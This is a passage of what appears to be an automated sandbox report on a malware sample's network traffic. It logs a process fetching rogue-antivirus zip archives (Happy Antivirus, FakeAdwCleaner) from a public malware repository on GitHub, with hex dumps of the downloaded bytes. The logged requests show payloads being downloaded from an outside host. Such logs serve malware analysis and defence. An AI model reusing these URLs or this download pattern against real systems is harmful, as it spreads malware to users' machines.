                                                                                                                                                    2022-09-29 12:58:48 UTC576INData Raw: ed 67 ff 00 3f 2f 78 26 0f cc 24 4e ab db d0 58 6d 23 9d 4f c0 aa ba 72 84 87 4d 31 6b 36 23 71 4c a3 c8 b8 2c 6b 2e 79 61 f6 97 68 dd 9e e2 ca b4 b6 eb fe 89 c6 9d 4e f5 4e ce 3d 15 1d 7a a7 16 e7 ad 9e dc 66 20 7c 96 d1 15 f6 cb 19 43 6a ea c8 b0 33 9b 14 ef 64 82 0e 5a 94 57 b3 8d 19 1c 3e 48 4d c9 5e 88 aa 8b 1d 96 d7 9a 40 ad 6c 95 ab a3 ce 3e b2 1d 00 9d 2b f4 3b 0b 0b bf 0a e4 8e 51 9d 31 65 d4 59 b5 27 aa 59 eb fe f7 71 cc 81 59 a1 9a d5 af f2 51 af 45 14 ab 68 46 ff 57 fa 15 b6 7d bf 27 20 f5 03 af c1 ba 9e e1 f6 e8 3f dd 7d 05 fe 08 e6 f9 33 b1 5e bc 37 17 18 0b 71 81 6f 37 de 8b 1a 6a f7 72 c8 4f 33 6e 4a cd 17 07 f3 dc 8a a1 bb 28 77 5b e4 de d2 9f af dd 0b 76 91 9b b8 e4 02 b4 f1 01 81 22 1a 1e ac 21 ee 8e e8 05 27 e6 5f 63 42 d8 f8 a5 9b 46
                                                                                                                                                    Data Ascii: g?/x&$NXm#OrM1k6#qL,k.yahNN=zf |Cj3dZW>HM^@l>+;Q1eY'YqYQEhFW}' ?}3^7qo7jrO3nJ(w[v"!'_cBF
                                                                                                                                                    2022-09-29 12:58:48 UTC585INData Raw: 89 d9 04 7b 1a 72 5f 70 e3 b9 d5 f4 a1 e0 04 fd 95 77 63 91 53 e4 07 43 2b 28 85 21 97 46 c6 4e 21 82 14 4c 3a af 50 52 7b ed 80 ef ab ad a4 42 8e e0 fb c5 cc ff 0f b5 56 59 aa 74 3e 4e 4b 8b c1 a5 63 71 55 98 97 e1 ad 42 09 81 13 e8 a0 2c 1f b1 fd 02 2c 91 d3 9a fd 45 25 05 f5 3a b0 b2 d0 85 bf 9a 7d 81 22 e3 dc ee 3f 7d c1 4e c2 96 88 ae f6 b7 c9 ca 38 5b a5 c4 49 e8 d0 88 31 d7 7f 83 20 46 34 c9 c5 c6 63 f8 10 de 16 e2 b0 76 4e eb 90 e5 04 67 52 df 26 ae 47 23 d0 61 26 b4 60 f0 9a 52 00 8f bd 23 9f 09 38 74 16 b8 56 c2 d9 2a 02 42 cd 0c b4 9d ba 3d 01 5e 73 f8 c5 38 09 bd c7 8e bb 45 60 fa 4b af 5a 35 a5 89 e0 30 af c6 61 19 96 c4 7a 5a ef cd 4c da b2 87 4d dd 35 bf 42 5d fc de 42 e1 71 df 14 05 6b ff 2c f8 84 cc 43 1c ce 06 50 3f dd ba 0d 2c 81 44 20
                                                                                                                                                    Data Ascii: {r_pwcSC+(!FN!L:PR{BVYt>NKcqUB,,E%:}"?}N8[I1 F4cvNgR&G#a&`R#8tV*B=^s8E`KZ50azZLM5B]Bqk,CP?,D


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    80185.199.108.133443192.168.2.349747C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:07 UTC11826INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 179477
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "38494344cdf51b86edbe1f76bf6911f46b9347e73d9f681d6b5db320a0b3f14c"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 0807:AB6C:283C1A:2CD1B7:63359351
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:07 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6965-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456348.701653,VS0,VE174
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 47a11ca16c4b93a18f315f3b89b98f795c7d2f40
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:07 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:07 UTC11827INData Raw: 50 4b 03 04 14 00 01 00 08 00 86 96 4d 46 d7 12 44 12 55 bc 02 00 48 fb 02 00 1d 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 46 61 6b 65 41 64 77 43 6c 65 61 6e 65 72 2e 65 78 65 8e 63 4d 32 e6 4e f1 06 d8 1d 2c 5b 55 6f 80 61 1d 89 c5 b9 23 17 4d c1 5d 39 28 9a 83 78 47 ee 2b b5 07 8d 3b d4 30 bd 6f 54 91 12 19 11 4c a9 f2 16 dd bf 38 2c 19 f9 23 af 82 53 4b f1 f8 80 6e f2 b4 22 67 da 4e 10 9b 5b 94 a7 03 15 5b 09 c4 b3 c7 d1 e4 ed 99 13 12 6c 94 b1 03 46 99 d6 66 20 52 49 0c 59 e7 3b 2e b9 b9 0e bc 4c 3e d8 15 6f 62 84 e0 96 7f 00 cc 6b 3d 98 16 92 50 73 fa 6d b9 60 24 13 1e 11 97 fa 5d 35 5a 94 46 f2 53 dc 7f b9 2e 13 e0 5c e7 b5 66 43 0a 6b f2 de 9c b6 63 70 8f 94 7b 83 60 80 8e ea b5 75 ea cb f9 d1 3a d9 23 6a 17 21 e8 64 dc 6d c2 46 56 04 a8 ad ca f4
                                                                                                                                                    Data Ascii: PKMFDUHEndermanch@FakeAdwCleaner.execM2N,[Uoa#M]9(xG+;0oTL8,#SKn"gN[[lFf RIY;.L>obk=Psm`$]5ZFS.\fCkcp{`u:#j!dmFV
                                                                                                                                                    2022-09-29 12:59:07 UTC11843INData Raw: 81 b5 56 d8 59 1b 5c a4 e6 d2 90 c6 e7 4f ab 39 97 67 fa 75 2a c3 1d 18 b3 2e ac 37 5c 21 94 7c 69 18 36 2e e0 4e db 92 0c d9 b1 ca 08 c7 38 8e 81 ec 64 b0 ed 48 54 2f 70 aa e9 6e 8b b7 e3 b0 ca 7e 67 31 fe 01 8b a3 e1 0e 63 b1 42 e4 a8 b1 a0 0d 04 e6 fb 5d 09 88 64 90 fe 0c 8a 80 af a1 4e 8b 5e ea ad ac de a9 b0 f9 b7 38 96 14 82 7c ec e6 9c 78 9c df b8 2c 1a 8c 7e 01 7e 2b 63 37 10 81 43 a0 f0 89 85 70 6c 16 8d ae de d0 ec 99 c4 ef ca 32 80 81 5a 1c fc 6b 75 cf f9 7e 4c 3c fd 54 ab 86 d8 c2 23 89 e4 08 c7 a6 de f7 72 74 1d b5 79 da 2e ca 2e f5 6b 65 c3 21 0a 83 87 00 df 52 20 da 04 a5 d5 35 39 6a f4 b7 d4 1f 04 a1 67 b2 e3 af 22 7a 9a b0 84 b4 00 e9 b2 31 0b b0 70 e8 59 0c 23 0f 48 5d db 81 1c e4 e9 a0 cb 97 6a c2 b4 e1 ea d4 02 8b 16 a5 34 38 cc a9 6e
                                                                                                                                                    Data Ascii: VY\O9gu*.7\!|i6.N8dHT/pn~g1cB]dN^8|x,~~+c7Cpl2Zku~L<T#rty..ke!R 59jg"z1pY#H]j48n
                                                                                                                                                    2022-09-29 12:59:07 UTC11859INData Raw: ab a8 2b 49 77 fe 93 07 87 6b fa 0d 8a 5d f3 a6 39 d3 20 94 9c 2d d8 19 c5 15 70 84 0a dd 31 9b 84 1c d0 e4 ce 2c 99 9b 60 54 ab 32 59 a9 01 44 e5 e4 3d 5d c9 ab ff 81 9b 10 1b b9 e1 27 2e 58 6e 6d c4 a0 41 ea 13 86 85 ce e2 a9 e0 d4 23 32 e7 a3 b2 95 ca 50 5e 27 f8 1e bc da c9 f4 9d 05 ed af 46 66 b5 49 0f 54 fe 4d 7f 38 2b 89 a1 1b 22 7c 19 40 8e a5 33 db 1d 95 07 b2 e9 ff 4d b7 15 ca f9 24 19 e4 ff 4c d8 13 cd 1f 10 71 5c c6 63 95 b6 10 da 61 2b 6a 15 ce 28 de 9a 12 4a ba 15 81 d8 60 5c ca dc 54 1e 3a a9 b6 a1 b1 ec 5b e0 64 db db 36 67 d6 b2 52 2b 9c f0 e1 df 0b 48 a8 c4 5e 5f a3 83 7b a8 e3 99 65 65 6a fb fe 1b 38 ea 17 88 19 15 f3 b4 d3 a7 f2 1f 3d 91 26 51 8f fc 68 3f 43 31 c8 63 a0 f5 bf ae d3 3a c3 66 06 56 c2 69 0f 71 00 5d be 68 48 bf 46 3c bd
                                                                                                                                                    Data Ascii: +Iwk]9 -p1,`T2YD=]'.XnmA#2P^'FfITM8+"|@3M$Lq\ca+j(J`\T:[d6gR+H^_{eej8=&Qh?C1c:fViq]hHF<
                                                                                                                                                    2022-09-29 12:59:07 UTC11875INData Raw: 5c 3f 01 47 71 77 0f 35 7e 81 1e c0 0f 00 a0 e0 e7 54 70 a5 21 5e 05 aa ce cf 4c cf 10 8e ef 76 62 df 1a af 58 fc 21 d2 95 68 75 b0 51 ff db 7e 39 be 81 62 cd 09 50 d7 41 ce 10 be cf 5e 2d ca 1c 03 96 49 37 70 35 b4 29 ab 25 59 29 4b df 1a de b0 a4 94 e6 c1 0e c7 72 b0 0a ea e2 e2 e3 b3 5c 03 19 80 cc 05 71 7f 1c 2d 82 49 48 32 10 c0 8c 35 30 92 fe f2 92 5a 0e a6 03 90 85 ce 39 7b ab f7 ff e3 5c b5 b1 6e 4c ae 2d 87 a6 80 3a 7a c3 14 59 52 92 a5 95 5f a1 17 2e 51 32 9b e5 76 a7 9f fd 56 d4 88 3f cb 10 6c da 96 83 bc 4b 83 6e 43 52 2a f5 7c 20 a5 2b e6 e5 d5 8e 5b 2c 4e 08 3c 04 32 95 6d 5c 39 8a ee b8 af c7 db 44 b3 d2 bd 14 af 42 16 cc f3 2b 03 07 a4 48 9f 6e 94 b2 f7 ce e4 69 49 eb b3 cb 0e c6 e3 67 1e 56 66 12 9f ad 27 47 b9 a2 4b da 64 04 cb 3b 4d 25
                                                                                                                                                    Data Ascii: \?Gqw5~Tp!^LvbX!huQ~9bPA^-I7p5)%Y)Kr\q-IH250Z9{\nL-:zYR_.Q2vV?lKnCR*| +[,N<2m\9DB+HniIgVf'GKd;M%
                                                                                                                                                    2022-09-29 12:59:07 UTC11891INData Raw: 9b 61 6d 6d fc 79 8b 6a 69 e9 3e 98 42 53 ae 9a 31 ca 0b dd f5 47 3f 86 7d 4f 0a 7a 91 b9 f5 e5 7b e5 98 2d f5 5b 41 94 73 7f 0e 24 60 cd 6b b7 3b c9 17 f8 ca 4b a6 24 3a 51 34 eb 3d c3 8c 41 c6 0b 8a f7 b1 29 6e 50 a1 ea 4d 82 fd 71 15 5f bf 15 e4 45 3c 37 9e f6 d1 a7 f5 a0 99 23 a2 6f 19 6e 63 6c 8b 26 1f 78 39 29 a7 d0 7b eb d8 ec ac e5 84 1c f8 41 0b ee e3 d2 5f fd 74 8e dc 2f e0 35 1d 64 db 2e 30 1e 3d 7d 9d a9 e9 f1 e3 c0 24 a5 b7 53 cf 9b 35 75 61 d6 d8 0d 94 fa 53 20 97 58 48 d7 ad 07 20 c2 cc 19 c4 89 2c f7 d9 59 33 ac 74 18 8d e0 3c e4 51 58 2c 11 98 ee 31 38 6f f3 9d e5 00 3f 11 83 83 4d 93 79 40 93 2e c6 44 c3 10 c3 a8 7e fb 9b b5 96 28 59 65 8e ee ca 84 c1 ea fd 9d c4 a1 f2 ce af 56 a5 46 96 cd 3e 1b e0 d4 bc 86 77 cd 0d 45 88 bf bc 52 51 83
                                                                                                                                                    Data Ascii: ammyji>BS1G?}Oz{-[As$`k;K$:Q4=A)nPMq_E<7#oncl&x9){A_t/5d.0=}$S5uaS XH ,Y3t<QX,18o?My@.D~(YeVF>wERQ
                                                                                                                                                    2022-09-29 12:59:07 UTC11907INData Raw: 5f 8b 72 e8 a4 ff 00 60 b0 d6 3b 81 0d d3 b4 97 8b a5 6d 55 94 ef 0f 87 4d ab 78 35 cb db 0f c4 f3 49 42 9a bf 7c 34 55 1b f2 39 e6 05 e2 37 cf ce 4b fd b0 20 7d df 88 3b ed cf fe 65 00 75 94 61 88 fc e8 a2 9d 43 41 24 78 bb a7 c3 8e 4d 2e 2b 49 f1 25 59 8d e5 c9 3a 31 20 ec 9b 0f 4b ef c8 fe de 0c f6 3c c8 49 12 ca a5 cb 93 50 b6 9d 83 db 95 cd 09 e0 e0 44 31 2c 98 15 93 3f af bd ae f4 d2 b5 7b d6 11 58 f4 6b 33 2c 55 e0 de 3b 69 ab 3b 8f 84 9a 0c 4c 24 3f 97 d4 fa 4a d5 92 4b e6 d7 9b 1f 63 77 a0 aa 5d b0 a8 02 ec a1 3f 61 2b 50 e0 40 4f b1 f2 4e 9e e9 f7 f3 72 80 45 22 55 1d 2d eb 0e e6 58 a2 42 a5 61 a3 f6 6b e1 7c 6f a3 7c 81 0b a7 04 0f 0a 2d 3b 8c ed ac f4 eb a5 6f f5 1f 44 92 4a e0 5c ae f3 f5 b6 98 6a 04 b6 10 30 6c c8 21 72 92 65 e8 3a 26 ec 84
                                                                                                                                                    Data Ascii: _r`;mUMx5IB|4U97K };euaCA$xM.+I%Y:1 K<IPD1,?{Xk3,U;i;L$?JKcw]?a+P@ONrE"U-XBak|o|-;oDJ\j0l!re:&
                                                                                                                                                    2022-09-29 12:59:07 UTC11923INData Raw: 5e 86 9c 78 b5 dc 50 b5 ba 02 68 6d b8 83 c0 20 aa 9a 64 c2 97 54 2c 97 59 92 aa 49 74 6b 1a d8 07 dd a3 79 49 ac 7c 72 d5 70 d3 a1 ee f9 6e 93 45 63 35 a6 39 bf cc 17 6b 26 89 78 e8 0c f1 b6 56 71 b6 4d cf 5b 92 ca 74 af 41 dc e0 7d f4 e6 17 ab 55 1b 68 0f 86 ac 4b aa 3c 34 ff 1f 45 36 28 04 77 7e a1 ea 38 28 20 d8 59 b2 de f2 c0 62 8c dd 51 67 92 a6 9a 96 60 d3 86 87 71 35 99 dc ea 91 09 e1 bc 7a a2 c6 21 d4 1f 9c e2 eb 33 43 ea 8c e1 63 5e 30 49 7e 19 bb de ee 5a d4 dc d4 ab 73 e0 08 e7 ac a0 17 9a bc c4 82 b5 70 de 60 93 d2 9f 1e a6 00 02 d6 8a 74 48 f6 ad f1 7a a0 9b 01 46 57 07 62 00 46 3d cd ec 71 fa d4 43 4d b5 f7 be 86 bb 6b f8 09 a5 af a3 97 eb 1f 1b be 10 52 02 83 17 79 20 39 1d 18 43 b5 e7 35 ab 55 7a 32 ad 6e 4b df f2 35 ef f0 b5 79 64 0d e4
                                                                                                                                                    Data Ascii: ^xPhm dT,YItkyI|rpnEc59k&xVqM[tA}UhK<4E6(w~8( YbQg`q5z!3Cc^0I~Zsp`tHzFWbF=qCMkRy 9C5Uz2nK5yd
                                                                                                                                                    2022-09-29 12:59:07 UTC11939INData Raw: f1 9b a0 5b 96 4e ff 66 71 05 a4 be af fa 01 80 08 03 23 24 5f 2b c4 2a 47 fd f6 01 c8 06 2c fd 51 e1 b5 c5 e3 09 18 0f 09 6a 85 e5 36 70 62 a0 c8 b7 9d 33 30 e0 fe 7a 9f a0 50 2d aa 70 f1 50 b0 f9 5e 8f 1a 31 85 25 df 6a 3d ac dc af 14 b8 f5 98 aa bc e3 bf da 5a 35 5e 3e 38 d4 ec 12 79 0b 78 d7 e4 92 58 49 ee 24 c1 22 95 d4 ef 45 f4 36 2e 72 0c c2 49 39 09 23 a6 fc c7 ed 5d 37 f8 c2 27 d8 ab 25 28 63 70 8d 5c ea 83 4e c6 40 f5 c6 46 bb 67 26 e1 11 23 55 58 a8 79 a1 50 44 59 e0 2e 12 98 4d c2 8d e2 0a 11 f4 7f 4e f0 f5 cd 63 71 52 e0 19 c7 21 14 00 62 81 9c 03 1f e4 88 21 28 c8 76 10 d8 af 79 5f 11 65 40 29 61 69 54 17 62 0e af c3 4d f0 d8 31 1b 51 58 cf f8 bf 70 ba cf d9 24 7d 69 72 2f 05 f5 f6 03 6f 03 28 d8 4f 72 56 d1 d7 5d 08 2c 1b 49 f2 45 16 2e 4e
                                                                                                                                                    Data Ascii: [Nfq#$_+*G,Qj6pb30zP-pP^1%j=Z5^>8yxXI$"E6.rI9#]7'%(cp\N@Fg&#UXyPDY.MNcqR!b!(vy_e@)aiTbM1QXp$}ir/o(OrV],IE.N
                                                                                                                                                    2022-09-29 12:59:07 UTC11955INData Raw: 10 12 91 79 d0 04 5f 76 57 50 77 bb 51 b1 6d 12 0b f9 7f ff d1 3b b6 79 0c 4c d8 79 67 04 79 81 a0 f4 a3 ea a7 40 4c dc fd ae 2b db 3f 4e ee a3 0c ba f8 0d c8 60 6e da 93 1c 1d 09 0b 4f 0e f0 32 dd d2 23 97 43 bc da b4 ab 82 9d 28 59 55 f6 05 43 19 e3 79 f3 19 57 bd 3f 01 fe 67 3f c4 04 d9 a3 8e a2 44 9c 45 49 b0 00 cc a5 57 6f ad 9e a9 8e ff 1c 45 cc a6 d4 a6 fc 6d ec a3 2d fb a7 b1 5b bf 57 cb 18 d2 35 ad 6b 4f be ff 38 8e 4b 8a 29 a0 10 9b d8 2e a2 e9 c6 9a 41 1d 56 89 d6 b3 12 a3 13 22 5d 81 6f 9b 43 00 73 5b 14 20 7d 2e e4 92 53 85 02 d8 24 d0 ca 87 f1 ef f2 1a b0 25 aa ad 46 3f 6d 2b bf 10 24 6a aa 32 78 e7 45 f9 85 b8 21 dc 1c 41 19 c7 a6 b8 5d c0 01 8e 30 c8 fd 88 9e 47 fb ce 29 a7 e5 27 46 c5 80 96 7a 4d cb 10 d7 4a 4b cd 39 b8 0a fb 50 2e ea 86
                                                                                                                                                    Data Ascii: y_vWPwQm;yLygy@L+?N`nO2#C(YUCyW?g?DEIWoEm-[W5kO8K).AV"]oCs[ }.S$%F?m+$j2xE!A]0G)'FzMJK9P.
                                                                                                                                                    2022-09-29 12:59:07 UTC11971INData Raw: 69 17 b7 1c 49 c1 de f1 70 ff 84 cb fa 0f 91 64 d6 97 1b 2a 6a 50 01 31 3f 26 e5 ea 65 0f e1 69 9b a8 21 47 98 d8 f4 f2 2b d1 9c 7b 36 01 55 cc 1c a8 a5 ba 3e 50 5d 47 38 1d 47 d3 f9 40 af 28 9b 35 9c 81 7a 4a f0 a6 f9 e2 09 26 af ad 2b 7e 66 da 97 d1 54 bc 47 be e3 7b a4 32 d9 10 90 aa 26 bd d0 e6 e6 40 9f 7c 9f 68 af e1 dc 88 d1 f0 67 50 26 cb 17 fe af 38 76 d2 c5 95 97 0d ae 78 88 70 f0 41 52 72 3b ca 49 f0 e1 4c af 5e f4 e2 cb 77 6e d2 18 3e 12 d3 bd 4f e4 8c 72 83 8a 12 e5 00 82 49 2c 24 83 6c a6 2f 90 98 fe 2f bb 90 7e 1d 20 16 31 0c 6f 5c c4 21 83 9d b3 4c a8 cc 2c 7e e9 73 80 fc 8d ce 1d 35 d3 7e 86 6e 7d b8 83 3a 97 c5 f1 19 01 c7 86 18 ea 18 4d ad ce 80 59 e8 1c 22 77 c9 0d 7b e5 d1 b8 98 9c 37 e9 34 d3 44 a9 e5 8e 93 c8 c9 a8 2a 34 4e 46 5b 2d
                                                                                                                                                    Data Ascii: iIpd*jP1?&ei!G+{6U>P]G8G@(5zJ&+~fTG{2&@|hgP&8vxpARr;IL^wn>OrI,$l//~ 1o\!L,~s5~n}:MY"w{74D*4NF[-
                                                                                                                                                    2022-09-29 12:59:07 UTC11987INData Raw: 47 c9 4c f8 85 c4 6c b0 f4 24 66 02 72 c8 c0 03 6e 50 30 77 78 e9 91 8d 4b f9 3b cf f9 e1 97 cc b2 ae 5d b5 f4 92 b4 5a 11 99 97 e4 1e bc 45 8d 3b 52 59 28 ad c5 51 7b d4 7c df 81 50 41 e6 88 3a 8f b6 51 1a a2 4f 91 b6 da 6d dd c5 ba d5 a0 d5 f6 29 92 f1 9e 2f 67 c8 50 d0 2b 2b b5 d3 fc 7d 4d a8 8f a2 3b de 48 dd 09 86 aa 5e 75 01 2b 3d 39 fe c4 ee c4 16 f2 82 ca 19 90 f3 44 89 66 46 7a 31 3f 84 09 28 a8 41 50 f8 b0 b0 6b 3d c5 43 ab 92 3f fe 7e 5b df 1b 1b 08 68 21 89 8d 03 e4 a3 23 5f 61 76 50 17 9f 4f 11 df fa 02 0b b2 f0 ba e5 c1 1f 86 84 67 b6 19 35 dd 06 64 34 55 7d ed 2d 76 82 8b 4d 78 54 d7 27 ab e2 26 9e c4 c9 da 07 27 9a 84 21 05 75 8d b2 09 26 36 2a 61 23 53 87 29 da 0b c0 3a e2 df 3d 14 49 fc 2b 9d 47 b4 47 49 88 58 a3 1a 1b 3c 51 ff ec 98 6d
                                                                                                                                                    Data Ascii: GLl$frnP0wxK;]ZE;RY(Q{|PA:QOm)/gP++}M;H^u+=9DfFz1?(APk=C?~[h!#_avPOg5d4U}-vMxT'&'!u&6*a#S):=I+GGIX<Qm


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    81192.168.2.349748140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:08 UTC12002OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    82140.82.121.3443192.168.2.349748C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:08 UTC12003INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:12 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:08 UTC12003INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    83192.168.2.349749185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:08 UTC12005OUTGET /Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    84185.199.108.133443192.168.2.349749C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:08 UTC12005INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 1721302
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "bb71b3fc58fb603cf14e33295d1c8eaf2a0ad05101b7a8b78df809147209e36e"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 9B5A:0543:E4C62A:F30433:63359351
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:08 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6935-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456348.284568,VS0,VE172
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: c745f06517ee37c2324439e9cfba5989cce54994
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:08 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:08 UTC12006INData Raw: 50 4b 03 04 14 00 01 00 08 00 1c 34 33 4c d9 8f 00 b3 16 43 1a 00 00 a2 1e 00 1d 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 48 61 70 70 79 41 6e 74 69 76 69 72 75 73 2e 65 78 65 f8 2b 0e 2e 8c 29 68 4b e2 fb 48 16 3b 20 4e 07 3a 4e 83 02 e6 8c a5 48 55 e4 32 b4 95 93 c6 a0 c3 7c ab 92 e0 87 d0 02 d5 04 78 62 70 65 75 9a 97 86 11 34 98 97 cd 97 73 74 dc 2c 4f 22 09 b0 c7 96 32 1d dc ca 93 24 ea 9d 57 89 17 31 56 cd df 61 9d e8 1e 3e f6 5c 66 8d 23 70 99 5c 0c 9a 19 24 e2 d8 c2 3c 6d a8 d2 5a be fc 3a 13 61 f6 f5 7a b5 d9 f8 42 70 0a 62 f9 42 c3 b2 50 ae e2 70 4f 5a 25 72 a4 ee b3 0f 10 eb e1 04 4a 1a c8 a6 26 29 7b ed 6e 8c cf 45 da 01 e7 d0 73 ba 2b 43 92 58 a7 d6 5f be fa 1e 84 cd ad fd 63 14 66 6a db 88 d7 78 2b d4 d3 70 17 58 a2 ea 55 e1 92 3a 15 2f 21
                                                                                                                                                    Data Ascii: PK43LCEndermanch@HappyAntivirus.exe+.)hKH; N:NHU2|xbpeu4st,O"2$W1Va>\f#p\$<mZ:azBpbBPpOZ%rJ&){nEs+CX_cfjx+pXU:/!
                                                                                                                                                    2022-09-29 12:59:08 UTC12007INData Raw: b5 53 d3 9c b3 09 c1 8e 8c f4 67 13 a1 5b 47 b1 d0 aa e0 fb 1c c7 d6 a4 30 fc 4a a5 34 07 ec cd 83 87 f6 d1 be e0 e7 42 ed c5 8e b1 c1 fb 18 a1 1d 7b 82 5b 5e 57 83 e3 52 2c 47 84 51 08 27 7e f3 6c 32 4f 33 4c 67 e7 1d fd 64 b3 b4 e9 5a 09 d2 b9 c6 a9 41 4d 82 2d ec 34 1d 3c 3b e6 19 27 57 7f 20 ac f2 17 37 09 40 c7 3a 92 b3 bd 3e 5f 62 2d 64 af ab 22 e0 c6 f8 66 1f 96 a8 77 7d 9d ba fd 05 f3 0b 0a 44 01 40 5c b8 e9 d3 a4 fa df a3 95 ef 04 64 e0 5d 73 fb b0 09 b3 35 b8 6b d4 3d 80 e2 f0 d4 31 54 37 de ee 08 59 59 12 87 e6 0c 82 d8 a3 78 2a b1 86 1c 7d 2d 26 35 5c d7 34 9e 19 d1 88 93 ac d3 df 9f 15 80 92 98 f0 8b 67 17 ce c6 0c 1d 0f 12 d2 5f 6d b1 8a 77 c0 ef 05 ce 9a 78 a4 0d 8c be c0 7c 69 89 1b 48 74 e0 be 58 bb 17 bd b7 c2 f1 b2 20 e8 76 eb db 9d 3c
                                                                                                                                                    Data Ascii: Sg[G0J4B{[^WR,GQ'~l2O3LgdZAM-4<;'W 7@:>_b-d"fw}D@\d]s5k=1T7YYx*}-&5\4g_mwx|iHtX v<
